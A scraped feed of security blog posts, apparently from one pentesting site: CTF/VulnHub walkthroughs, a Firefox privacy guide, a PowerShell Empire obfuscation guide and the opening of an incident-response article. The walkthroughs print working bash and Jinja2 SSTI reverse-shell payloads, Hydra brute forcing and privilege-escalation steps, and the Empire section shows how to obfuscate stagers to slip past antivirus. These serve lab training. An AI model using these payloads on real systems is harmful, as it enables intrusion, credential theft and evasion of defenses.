smbclient -L \\192.168.0.165

smbclient \\\\192.168.0.165\note

ls

get note.txt

exit

cat note.txt



Since there is a user on the machine by the name of goper. It is possible that goper has the access to the FTP service. The issue with this theory that we are still unaware for a password for the user goper. This is where we thought that Bruteforcing is a good idea. We used the rockyou wordlist and Hydra as the tool to bruteforce. In few seconds it was in front of us that the password for the user goper is spiderman. My spider senses are tingling here. Let’s take a look inside the FTP service.

hydra -l goper -P /usr/share/wordlists/rockyou.txt 192.168.0.165 ftp



We connect to FTP service using the credentials that we just found. Here we have a python file by the name of status. We downloaded the status.py to our local system to take a closer look at it. A simple look on the script tells us all this does is send ping packets to the server or home IP Address and writes the Status that Server is up or down in a file status.txt inside the user jenny’s home directory. Cool another user.

ftp 192.168.0.165

ls

get status.py

bye

cat status.py



Exploitation

Since there is a backup functionality and FTP service that means we can upload files to the target machine as the user goper. This makes this simple. We can create a simple bash reverse shell and upload it using the FTP service and get a session on target machine. We created a shell file as shown in the image below.

#!/bin/bash

bash -i >& /dev/tcp/192.168.0.147/8080 0>&1

Now we connect to the FTP service again and we upload the backup.sh payload file using the put command. The upload was successful.

ftp 192.168.0.165

goper

put backup.sh

ls



Post Exploitation

We started the netcat listener to capture the session generated by payload. We get the session in a few moments. After getting the session, we use the sudo -l command to check for the binaries that can be used to escalate the privilege on the target machine. We can see that we can execute the status.py file with root permissions as jenny user. That means we need to first replace the status.py with a reverse shell and get a session as jenny user.

nc -lvp 8080

sudo -l



We created a reverse python shell targeting port 8888 of our local machine.



Now we need to send this file to the Target machine. For this we will be using the FTP service. Now that we have uploaded a shell file but it wont have the execution privileges. For this we will use the chmod command from the FTP shell as shown in the image below.

put status.py

chmod 777 status.py



Now we create the listener on the port 8888 and get back to the session we have as the goper user. Here we will execute the file we just uploaded as jenny user.

sudo -u jenny /usr/bin/python3 /home/goper/status.py



We get back to the listener we created. Here we can see that we have a session as jenny. We move to the tmp directory as it has write permissions. Then we download the pspy64 script on the target machine. We provide it with proper permissions and execute it.

nc -lvp 8888

python3 -c 'import pty; pty.spawn("/bin/bash")'

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

chmod 777 pspy64

./pspy64



We see that there are processes related to tmux server. This means that it is possible to get the root using tmux.



We also take a look at the history and find that a lot of tmux was used. This command shows that a session of tmux is being shared. We can also see that tmux default is located in the opt directory.



Privilege Escalation

To get root from tmux is not that difficult of a task. If you are not familiar to tmux or getting root as tmux, check our article here. We need to Export the Term to xterm to execute it using tmux.  Now use the tmux to attach the default socket.

export TERM=xterm

tmux -S /opt/.tmux-0/sockets/default attach



Now that tmux is executed with set the TERM to xterm and we have the root privilege as shown in the image below. Now, we will traverse into the root directory to read the root flag. This concludes this box.

id

cd /root

ls

cat proof.txt

Firefox for Pentester: Privacy and Protection Configurations

$
0
0

Introduction

This is a second article in the series “Firefox for Pentester”. Previously we talked about how we can enhance the Privacy and Protection in Firefox using various add-ons and so, in this article we will become competent to protect ourselves online through the configuration options that Firefox provides us. In comparison to other browsers, Firefox protects our data and information the most. And we all know that Mozilla Firefox is plausibly the best browser available today. It provides privacy features, active development, amazing security, and the cherry on top is it has frequent updates.  But we can still make it much more secure by modifying a few options.

Table of Content:

·         Introduction

·         Configuration Settings

·         Isolating First Party Domains

·         Preventing Browser Fingerprinting

·         Enabling Tracking Protection (Browser Fingerprinting)

·         Enabling Tracking Protection (Crypto Mining)

·         Enabling Tracking Protection

·         Blocking Ping Tracking

·         Disabling URL Preloading

·         Keeping Clipboard Private

·         Disabling EME Media

·         Restricting DRM Content

·         Disabling Media Navigation

·         Restricting Cookie Behaviour

·         Control Referrer Header

·         Restricting Referrer Header

·         Restricting WebGL

·         Disabling Session Restoring

·         Disabling Beacon

·         Securing Remote Downloads

·         Firefox Prefetching

·         Disabling IDN Punycode Conversion

·         Conclusion

 

Configuration Settings

When playing with the configurations in Firefox, numerous elements should be examined. Every option should be understood well enough for the changes to be made as they will change the way you browse your internet. To make changes in configurations of Firefox, type “about:config”in the URL bar as shown in the image below:



 

Once the about:config page loads, it will show you a warning. The warning will state that from here on if you change anything then it will void your warranty and whatever changes you make will be at your own risk. To move forward from here left click on the “I accept the risk!” as shown in the image above. Once you click on the button, you will meet with the page shown in the image below. Here are all the options regarding online privacy and protection present.



Isolating first-party Domains

Through the first option, we will modify is “privacy.firstparty.isolate”. This built-in characteristic allows you to only access first-party domains. That means all the third-party domains that tag along the first-party domains are now blocked and cannot track your activity online or collect your data. All this is possible as it isolates the first-party domains from others and stores your data separately so that cross-origin tracking is nullified. Hence, third-party cookies, hidden cookies, data sharing, and other options will be disabled.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default tomodified as shown in the image below:

privacy.firstpart.isolate

Preventing browser fingerprinting

The next option is “privacy.resistFingerprinting”. To understand what this option does, let us first understand what is browser fingerprinting. Client-side scripting that allows the website to load in the browser permits browser fingerprinting. Through this, they collect the information about the browser, operating system, cache-control header, all kinds of headers, list of fonts, plugins that are being used, microphone, camera, etc. Hence, they are called cookie-less monsters. This process of browser foot-printing starts the moment a connection is made with the website. And these features are exploited through credential hijacking, data breaching, etc. All of this can be stopped by enabling the “privacy.resistFingerprinting” option in your browser.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default tomodified as shown in the image below:

privacy.resistFingerprinting



 

Enabling Tracking Protection (Browser Fingerprinting)

The next option that we are going to talk about is privacy.trackingprotection.fingerprinting.enabled . It works the same as the previous one. As this one too protects you from browser fingerprinting. Along with preventing tracking over the websites, it also prevents phishing attacks.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default tomodified as shown in the image below:

privacy.trackingprotection.fingerprinting.enabled

Enabling Tracking Protection (Crypto Mining)

The problem with crypto miners is that the calculations they do, require huge resources such as CPU, power, and RAM. These resources are expensive and not everyone can afford it. So, what hackers do is that they control systems of various people and carry out the deed of crypto mining from there system. So to stop your browser to fall victim to cryptomining all you have to do it enable the privacy.trackingprotection.cryptomining.enabledoption.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default tomodified as shown in the image below:

privacy.trackingprotection.cryptomining.enabled



Enabling Tracking Protection

Our next option i.e. privacy.trackingprotection.enabled enables us to completely stay non-existent to the tracking that is done through the browser. Tracking is keeping a record of your internet searches, the website you visit, data you share, etc. and this option nullifies it by blocking every kind of tracking. It works on the disconnect.me filter list.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default tomodified as shown in the image below:

privacy.trackingprotection.enabled



Blocking Ping tracking

To understand the next option which is the browser.send_pings, let us first understand hyperlink auditing. It is a method of tracking where the HTML code makes your browser ping a specified URL. This URL is pinged upon the visitation of the website that you mean to visit. This method is of tracking is different from other methods as it doesn’t give users any kind of choice. It just runs in the background without the user knowing. So to shut this method of tracking, you have to go into the configuration of the Firefox and disable the browser.send_ping option. This option here makes sure that the browser blocks every kind of hyperlink auditing.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default as to allow hyperlink auditing. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

browser.send_pings



Disabling URL preloading

This browser.urlbar.speculativeConnect.enabledoption helps us to control URL preloading. Whenever typing in the URL, halfway through the typing you must have noticed the auto-completion of the URL. This is known as URL preloading. How this works is when you start by typing a URL, it will send out domain queries so that it can carry on with auto-completion. And so, by disabling it, the preloading of URLs into the URL bar will stop. This helps to prevent the suggestions which you do not want or which can be presumed as insecure.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

browser.urlbar.speculativeConnect.enabled



Keeping Clipboard private

Whenever you copy, cut or paste anything from or to the website; it gets notified in detail so much as that they will know what part of the webpage you copied. This is done by keeping a track of your clipboard. Through the dom.event.clipboardevents.enabled option we can make sure that the websites do not track our data from the clipboard.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

dom.event.clipboardevents.enabled



Disabling EME media

There have been many instances recorded where medias files have been downloaded. These files were proved to be encrypted when they downloaded their self, it was hard to detect them and their data. Firefox provides us with an option through which we can make sure nothing of such sorts happen.

This media.eme.enabled option is set to false by default. This means that no encrypted media will be download without the user’s permission. It can be searched through the search bar. If by any chance this option is enabled, make sure to disable it as soon as possible. And if it is disabled by default then the status of this configuration will remain default as shown in the image below:

media.eme.enabled



Restricting DRM content

The content you surf on the internet can never be trusted. Usually, when DRM based software’s are running on the website, they can have file-level control and even user-level control. The user-level control allows them to access, share, download, or print anything they desire. Therefore, you must be in control always. Even if your browser nags you to enable DRM content you shouldn’t fall for it because if you do not want to see it shouldn’t be able to see it. Firefox provides us with an option i.e.media.gmp-widevinecdm.enabled that allows you to restrict DRM content.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default tomodified as shown in the image below:

media.gmp-widevinecdm.enabled



Disabling Media Navigation

This option, if enabled will allow your browser to extract information from your system and present it to the websites you visit. The data collected from the system can be forwarded to the Third-party domains as well. The thing is if you allow this option then it will collect the information about the operating system, screen resolution, type of system, FrameRate, facingMode of the mobile devices, possible access to user media, etc. And to make it even worse, they can control permissions of the audio/visual tabs in the browser as well as access the camera or microphone. Hence, we all can come to an agreement that keeping this option enabled is a major threat. And to save us from the potential threats, we just have to disable the media.gmp-widevinecdm.enabledoption.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

media.navigator.enabled



Restricting Cookie Behaviour

There are various cookies generated when a website is visited. These cookies can be necessary which are used for the features of a website. And others are the unimportant cookies such as third-party cookies. These cookies are often the result of advertisements, widgets, and web analytics. They track your login information, shopping carts, language you use, etc. By default, the value for network.cookie.cookiebehaviour is set to 0. This value can be set between the numbers 0 to 4, where:

0 = accept all cookie values

1 = only accept from first-party domains

2 = block all cookies by default

3 = use p3p settings

4 = storage access policy: Block cookies from trackers

We will select value 1 here as we only want cookies from first-party domains.

network.cookie.cookieBehavior



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:



Control Referrer Header

While browsing the internet, a referrer header is sent to the website which is requested. This header contains the information about the page where u previously was and from where did you request the next webpage.  Usually, the Firefox will not send a referrer header from HTTPS to HTTP. Sending such information over a referrer header creates security issues as they can expose your personal information and private data. To put it simply using this option you will be able to control whether you want the referrer to be sent over the cross origins or not.  Now, this data can send to different origin domains i.e. across origins.  But Firefox’s built-in tracking protection provides a solution to it through network.http.referer.XOriginPolicy option. This value can be set between the numbers 0 to 2, where:

0 = send the referrer in all cases

1 = send referrer only when the base domains are the same

2 = send referrer only on the same origin

The default value of this option is 0 i.e. send the referrer in all cases and we will change its value to 2 i.e. send the referrer only to the same origin.

network.http.referer.XOriginPolicy



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

 


Restricting Referrer Header

With the previous configuration setting, we learned that we can control whether we want to send referrer headers across origins or not. Now there will be many situations where it will be necessary for you to send these referrer headers across origin or even in the same origin. Here, what you can do it restrict the header by controlling the elements of the header. The option network.http.referer.XOriginTrimmingPolicyallows us to do so.  This value can be set between the numbers 0 to 2, where:

0 = send the full URL

1 = send the URL without its query string

2 = only send the origin

The default value of this option is 0 i.e. send the full URL and we will change its value to 2 i.e. only send the origin.

network.http.referer.XOriginTrimmingPolicy



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

 


Restricting WebGL

WebGL is an option provided by Firefox which turns every webpage into 3D graphics. Alas! It comes with various security flaws. It makes it possible for the attackers to target your graphic drivers along with GPU to extend of making your whole system useless. Whether you want to use such an option or not is left to user decision by Firefox when it introduced webgl.disable configurational setting. Through this option, you can disable the WebGL.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from defaultto modified as shown in the image below:

webgl.disabled



Disabling Session Restoring

There are times where the user experiences some crashes or power outages that cause the system to shut down. If the user has some URLs opened in the browser or logged in some application they are restored when the user restarts the system. Ever since the release of Firefox 2.0 this option is enabled by default. Some users feel that this is a good functionality that helps them recover data or sessions but this poses a security threat as the if the original intended user doesn’t restart the system or if this happens on a Public system than the person who accesses the system after the restart gains the potential access of that logged-in sessions and websites that the original user was browsing. This option contains 3 possible values.

0 = Store Extras Session data for any site

1 = Store Extra Session data for unencrypted (non-HTTPS) sites only

2 = Never store extra session data

The default value of this option is 0 i.e. Store the session data for any site and we will change its value to 2 i.e. Never store any data.

browser.sessionstore.privacy_level



This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:



Disabling Beacon

IEEE 802.12.4 says that beacon-enabled mode is to be applied through the network. It sends information about the personal network to the servers to inform them about the presence. This allows new devices to connect from time to time. It is useful to maintain network synchronization. But it not compulsory as it sends over the details about the network you are on.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. You can double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

beacon.enabled



Securing Remote Downloads

By default, remote safe downloads are enabled in Firefox. And we have often talked about the instances where the file that is being downloaded seems genuine but instead, it can be a malware. And you can never be too sure. Using browser.safebrowsing.downloads.remote.enabled we can be a step closer to know we are downloading safe files and nothing is remotely tagging along with the file.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. You can double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

browser.safebrowsing.downloads.remote.enabled


Firefox Prefetching

As the name tells, prefetching in Firefox is done to speedily load webpages for the user. A browser can always summon the parameters beforehand that it knows will be used by the websites. These parameters contain data regarding resources to be used. Hence, at any point in time, they can be request and the browser will prefetch the required information for the user. The browser will foretell the domain names that you are most likely to visit which speeds up the process of domain name resolving. This option was developed to save time on the user end but it turned out to be a security concern. Firefox can prefetch things like DNS, network, IP address, etc.

This prefetching can be done via DNS (everything related to DNS) or HTTPS (HTTPS contents). And has been proved to be a security concern and so both DNS and HTTPs prefetching can be disabled via the following options:

network.dns.disablePrefetch

network.dns.disablePrefetchFromHTTPS

Both options are set to false by default. To disable these options, change them to true and there will be no DNS and HTTPS prefetching. Once these options are disabled, the status of these options will be changed to locked just as it is shown in the image below:



Another prefetcher that you can disable is network predictor. This option prefetch all the details related to the network that you are connected to. It can be disabled by setting it value to false. This value is set to be true by default. Once the change option’s value to false; its status is changed to modified as shown in the image below:

network.predictor.enabled



Another option to disable to disallow the browser to prefetch network details is network.predictor.enable-prefetch. This option is allowing all the network details to be prefetched as its name suggests. It can be disabled by setting it value to false.

network.predictor.enable-prefetch


The network.prefetch-next option allows certain links to be prefetched. This is done when the website lets the browser know that certain pages are likely to be visited. Therefore, the browser downloads them beforehand for the convenience of the users.  It can be disabled by setting it value to false. This value is set to be true by default. Once the change option’s value to false; its status is changed to modified as shown in the image below:

network.prefetch-next



Disabling IDN Punycode Conversion

Before understanding this particular option, first, you need to understand the meaning of IDN support. IDN makes it possible for the website to register the domain names using the characters that are originated from their local or native language. To expand the support of these characters a new encoding was developed called “Punycode”. By default, the value network.IDN_show_punycode is false. This means IDN is enabled. But no matter how good a feature is, it can be abused. This was shown when in 2005 there was a huge rise in Spoofing and Phishing attacks using IDNs. This can be explained using the following example:

Original Domain: https://hackingarticles.in

Pishing Domain: https://hackingarticlés.in

Notice the é in the pishing domain. When this option is enabled it converts é to e so that users that don’t use é in their language can see it as simple e. But this conversion also makes it impossible for a user to visually differentiate between the genuine and phishing domains.

This value is set to be false by default. Once the change option’s value to true; its status is changed to modified as shown in the image below:

network.IDN_show_punycode


Conclusion

By enabling and disabling the configurations options provided by Firefox you can achieve privacy and protection online without using plug-ins. This is a safe procedure as the third-party domain cannot track you. If you are having issues with any particular web application or authentication or media with these options enabled/disabled then what you should do is create a container in Firefox by using a temporary container plugin or profiling that is provided by Firefox. So that you are safe and cross-origin tracking isn’t done in your browser. Hence your data and personal information are safe.

 

Insanity: 1 Vulnhub Walkthrough

$
0
0

Today we are going to solve another boot2root challenge called "Insanity: 1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Wireshark

Exploiting

  • SQL Injection through e-mails
  • Password theft in database
  • Weak hash cracking

Privilege Escalation

§  Cracking to passwords stored in Firefox

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- insanity.vh

 



Enumeration

The recognition and enumeration of vulnerable services has been the hardest part of this machine. Since it had many services to which they managed to entangle you, turning out to be all of them (except one) rabbit holes.

 

Some evidence of these services (rabbit hole):

FTP:



Bludit (From here we will list the user "Otis".):



phpMyAdmin:



Having seen the above, we will go directly to the correct and vulnerable services.

We start with the organization's web service, a hosting service.



We puzzled with dirsearchand found several directories, but we will focus only on two "/monitoring/" and "/webmail/".



Well, we used the user "otis" and the password "123456" (I took it out with guessing).



We will enter a panel are monitoring the internal server, we see that we can add new servers.



We insert our IP (it can be another one that is operative) and we see that it marks us "Status: UP". What does this tell us? Well, that the application below is running ping to our machine to check if it is on.



We use dirsearchagain, this time we will fuze the content of “/monitoring/”.

We go through the directories obtained, until we reach the directory "/monitoring/class/".



We access the directory and we find what we already imagined, a "ping.php" file.



We open Wireshark and see that the machine does indeed execute a ping. Do you think the same as me? Of course we do! A command injection!


Let's do as usual, a proof of concept.



We wait for it to run, but we see that it does not work (Status: DOWN). We contrast this information with Wireshark and see that it does not move either, so we are in another "rabbit hole".


Well, nothing, we continue with the other service. Now we have a "SquirrelMail" in version 1.4.22, if you look for exploit you will find that it is vulnerable to remote code execute (RCE), but I already advance you that it will not work either xD.



We use the same credentials, access the "Inbox" and see that emails with errors are arriving. Attention! These emails only appear if the server is "DOWN".



We read one of them, if we look at it, it is structured in 4 columns... This is something that called my attention a lot, since it seems to be loading this information through a database.



Seeing this, I lost my mind and came up with the crazy idea of launching a payload list of SQL Injection (/usr/share/wfuzz/wordlist/vulns/sql_inj.txt).

Configuration Attack:



Executed attack:



We are checking all the emails that we receive, we find this one that shows "Localhost", therefore, the site is vulnerable to SQL Injection.



We do another test, this time we list the hostname and version of MariaDB.



Exploiting

We continue to exploit the vulnerability, although this would be faster by posting only 3 photos, I think it is worth seeing all these images, which will help us learn how to exploit SQL injection without any tools.

Obtain user and database:



Obtain all databases:



Obtain all tables:

 


Obtain all the columns in a table:



Dump users, passwords and emails:



After trying to crack the hashes of the two (hidden) users, it is not possible to obtain it even with JTR, Hascat or other online tools. Everything looks like another "rabbit hole".

We continue to list and find these two hashes in the "mysql" database.



The 2nd hash does not correspond to that of a MySQL, we use the online tool "hashes.com" and obtain the password in plain text.



We logged in through SSH and great! We are in!



Privilege Escalation (root)

We do an "ls -lna" and see that we have a "Mozilla Firefox" folder, very very rare.

Whenever you see software folders, check it out, because it's not normal.



We check if the browser has been storing user passwords. How to check this? As simple as listing these 4 files.



If these files exist, it means that they contain passwords and we can use a tool “Firefox_Decrypt” to obtain the passwords in plain.

We download the tool, choose the 2nd optionand we will NOT give you a password when you ask for the "Master Password".

We will get some credentials in the "root" user plane.



We try to authenticate with the user "root" and the password obtained and.... Yes! we are root!

We read the flag and have a good coffee.



Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedInand Twitter.

Defense Evasion with obfuscated Empire

$
0
0

In this article, we will learn the technique of Defence Evasion using the PowerShell Empire. PowerShell Empire is one of my favorite Post Exploitation tools and it is an applaudable one at that.

Table of Contents:

·         Installation

·         Getting a session with Empire

·         Obfuscating with Empire

Installation

When evading all the target defenses with Empire, it is important to focus on installation. There are two methods to install Empire, obfuscating scripts would not work if you install Empire using apt install command. But this problem wouldn’t occur if you use the git clone command as shown in the image below.

git clone https://github.com/BC-SECURITY/Empire

The above command will download Empire on your system and to install it, use the following command:

cd Empire/

cd setup/

.install.sh

 



Getting a session with Empire

With the above commands, your Empire is downloaded and installed. Let us now get the Empire up and running and take a session of the target system. Once you start Empire, the first thing to do is to start a Listener. And to start a listener, use the set of following commands:

listeners

uselistener http

set Port 80

execute

 

The above commands will start a listener on port 80. Once the listener is active, we have to launch a stager. The stager that we are going to use in this article is of windows and is in batch language. To launch the stager, use the following set of commands:

back

usestager windows/launcher_bat

set Listener http

execute

 



Once your malware is ready, it will be stored in /tmp directory by default as you can see in the image above. To send this bat file to the target system, you can use python one-liner server or any other method you like. We used a python server for our this practical. To use the python server, type the following command in the directory where the file is saved like in our case it was /tmp directory:

python -m SimpleHTTPServer

 



Once the file is executed in the target system. You will get your session as it is shown in the image below. To access the session or agent (as per the Empire terminology) use the following commands:

agents

interact <agent name>

 



In the event viewer, you can go to the Applications and Services Logs > Microsoft > Windows > PowerShell > Operational and check the log made by the batch file from Empire as shown in the image below:



Obfuscating with Empire

Now, you can see in the image above that the log of the file gives proper detail of the malicious file. These details include the code of the file, where the file is stored, and other important details. These details, when readable by the system, makes it easy for the file to be detected. For successfully attacking the target, it is important to evade all the defenses put up by the target. And to do so, we will globally obfuscate the Empire and then create our malicious file. Obfuscating the Empire will mean all the malicious files that will be generated from Empire will be obscure i.e. they will be had to detect in the target system and will allow you to bypass the defense systems like antiviruses. To obfuscate the Empire, use the following command first:

preobfuscate

The above command will download all the scripts required for the obfuscation.



The command executed above takes a bit of time but if it allows us to be successful in our attack then little time is no problem and most importantly it is worth it. Once all the obfuscating scripts are downloaded, execute the following command:

set Obfuscate true

This command will initiate the obfuscating and all the stagers developed and agents created will be obfuscated, which you can see in the image below:



Now once the obfuscation is active, we will once again execute the listener as shown previously in this article and once the listener is up and running we will launch a stager with the following set of commands:

usestager windows/launcher_bat

set Listener http

execute

 



Similarly, like before, use the python server to deliver the malicious file to the target system.

Once the file is executed in the target system; you will get a new session as shown in the image below. To access the new agent, use the following commands:

agents

interact <agent name>



Now the session we have received is through obfuscation and we will confirm this by using Event Viewer. Follow the same path as earlier (Applications and Services Logs > Microsoft > Windows > PowerShell > Operational) in the Event Viewer to see the log created by our malicious file.  AS you can see in the image below, the details that the log has now is vague and confusing. This makes the file unreadable by the system and is successful in dodging defenses such as anti-viruses.


This way Obfuscated Empire can save you from getting caught in the target system. It is important to learn such techniques to glide by the defenses in the target system to test whether the defenses in the place are proper or not.

Tempus Fugit: 3 Vulnhub Walkthroughs

$
0
0

Today we are going to solve another boot2root challenge called "Tempus: 3".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to @4nqr34z& @theart42. Let's start and learn how to break it down successfully.

Level: Hard

 

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Ghidra

Exploiting

  • SSTI (Server Site Template Injection)
  • Dump credentials database SQLite
  • Malicious Module Processwire (Reverse Shell)

Privilege Escalation

§  Backups and abuse OPT Auth Google

§  Abuse script created users with arbitrary UID

§  Reversing binary and ping binary abuse

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- tempusf3.vh

 


Enumeration

We access the web service and start listing versions, code, users...



In the following image, we see 3 users, and the image tells us that we are going to have fun with this machine xD.



We listed an authentication panel, we tried brute force, but it is not possible to access it.



Forcing the application to show some error, we see that it writes what we pass it through the URL.



This reminded me that I might be vulnerable to SSTI (Server Side Template Injection), so let's do a proof of concept:



Exploiting

Before we will check what type of template you use, if it is "jinja2" it will show the number of times the number we multiply it, otherwise it will multiply it giving "81", in this case it will be "twig".

As you can see, we are in front of a "jinja2".



Indeed, it is vulnerable. We are going to try to execute a command to check if it prints it on the screen.

$ {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}



Now we will put a netcat to listen and we will execute the following command to obtain a reverse shell.

$ {{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.10.167/4444 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}



We read the file "app.py", this file contains the "secret_key" (flag nº1) and "pragma key".



We decode the base64 and find the first flag.



Listing the binaries we have access to, we find "sqlcipher", if we look for information about "pragma key", we will find that to dummy the information, we will need the help of this tool.

These will give us the three registered users on the website and another flag.



We decode and get another flag.



We access the 3 users with their respective passwords, we will obtain the same information.

In that string in base64 we will find the flag nº 2.



We decode again.



If we look, both profiles show us the number "37303". We do an internal port scan with a python script (In google there are many).

We list three open ports, including "37303".



We do a port forwarding and see that this port corresponds to an OpenSSH.




We repeat the port forwarding, this time with port 443.

We will have access to a new website, we see that it gives us the clue that "Hugh Janus" is the administrator.



We see that the user "Anita" has come up with the great idea, that users can upload files.

We also list the access to the administrator panel.



We tried to access with the user "Hugh-janus" but it gives us error, now we try with the user "admin" and the password of "Hugh", we will enter without problem to the panel.



We found an upload to upload modules, we downloaded a proof of concept module from the official website.

We unzip, edit the file "Helloworld.module.php" and add to the "else" a reverse shell.



We upload the file and load it.



We put a netcat to listen and edit any page of the CMS. We check our terminal and we will have access to the machine.




Privilege Escalation (user Myrtia)

After an exhaustive enumeration, we find an image in the "backups" folder, the name mentions one of the users of the system.



This is a QR code, we read it and it will give us a temporary code to access a service.



This reminded me of a machine I did recently, so I set up this "OUPAUTH" (possibly Google Authentication) to my cell phone and we connected via SSH.

And also, we check that we can execute the "addcustomer" script with the root user.



We run the script, fill in the data and then check if it is possible to create users.

The following image shows that it is.



At the moment, we don't find it very useful, besides the script is executed from the root directory and we don't have access to it.

We continue listing the user's home files that we have gained access to and read the 4th flag.



Privilege Escalation (user Cecil)

We keep listing files and directories, we find a file called "...", quite suspicious and with a different UID. We do not have access to this file.... But... What if we create a new user and assign this UID?



Let's give it a try! We create a new user, we assign it suid"1337", we check that the user has been successfully created by reading the "/etc/passwd".



We authenticate with the new user, execute our two favorite commands to get an interactive shell and read the file "...".

We get a private key from OpenSSH.



We are not clear to which user it belongs, so we will try one by one until we manage to connect with the user "cecil".

 


Privilege Escalation (root)

According to a clue given by one of its creators, the "ping" binary had to be revised. We opened ghidra and found that the binary opens a shell if the UID and the string "deadbeef" match when executing the "ping" command.



We already have the user equivalent to the UID, we just need to execute the command specifying "deadbeef".

We execute a ping, the binary will do its checks and will give us a shell as root.



And finally, we will read the last flag.



Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedInand Twitter.


Fast Incident Response And Data Collection

$
0
0

In this article, we will gather information utilizing the quick incident response tools which are recorded beneath. All these tools are a few of the greatest tools available freely online. Through these, you can enhance your Cyber Forensics skills.

Table of Contents

·         Live Response Collection-Cederpelta Build

·         CDIR(Cyber Defense Institute Incident Response) Collector

·         Fast IR Collector

·         Panorama

·         Triage-Incident Response

·         IREC -IR Evidence Collector | Binalyze

·         DG Wingman

Introduction

INCIDENT RESPONSE

·         Incident response, organized strategy for taking care of security occurrences, breaks, and cyber attacks.

·         IR plan permits you to viably recognize, limit the harm, and decrease the expense of a cyber attack while finding and fixing the reason to forestall future assaults.

DATA COLLECTION

·         Data collection is the process to securely gather and safeguard your client's electronically stored information (ESI) from PCs, workstations, workers, cloud stores, email accounts, tablets, cell phones, or PDAs.

 

Proof of Concept

Live Response Collection-Cederpelta Build

Live Response Collection -cedarpelta, an automated live response tool, collects volatile data, and create a memory dump. .This tool is created by BriMor Labs.

You can download the tool from here.

Live response is a zone that manages gathering data from a live machine to distinguish if an occurrence has happened. Such information incorporates artifacts, for example, process lists, connection information, files stored, registry information, etc.

Itsupports Windows, OSX/ mac OS, and *nix based operating systems. This instrument is kind of convenient to utilize on the grounds that it clarifies quickly which choice does what.

Let’s begin by exploring how the tool works:

The live response collection can be done by the following data gathering scripts

